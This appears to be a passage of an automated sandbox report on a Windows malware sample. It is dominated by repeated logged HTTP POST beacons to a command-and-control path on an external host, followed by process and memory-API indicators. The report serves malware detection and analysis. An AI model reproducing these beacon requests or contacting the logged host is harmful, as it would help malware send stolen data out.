Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: global traffic HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 163Connection: close
Source: unknown DNS traffic detected: queries for: andreameixueiro.com
Source: unknown HTTP traffic detected: POST /az/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: amirantoyo.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C3D4B8B8Content-Length: 190Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown HTTPS traffic detected: 199.195.117.165:443 -> 192.168.2.4:49772 version: TLS 1.2

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7423B NtWriteVirtualMemory,LoadLibraryA, 0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A783F0 NtAllocateVirtualMemory, 0_2_02A783F0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7D614 NtProtectVirtualMemory, 0_2_02A7D614
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7DC22 LoadLibraryA,NtSetInformationThread, 0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A762AE NtWriteVirtualMemory, 0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A7828E NtAllocateVirtualMemory, 0_2_02A7828E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A77293 NtWriteVirtualMemory, 0_2_02A77293
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe Code function: 0_2_02A762F2 NtWriteVirtualMemory, 0_2_02A762F2
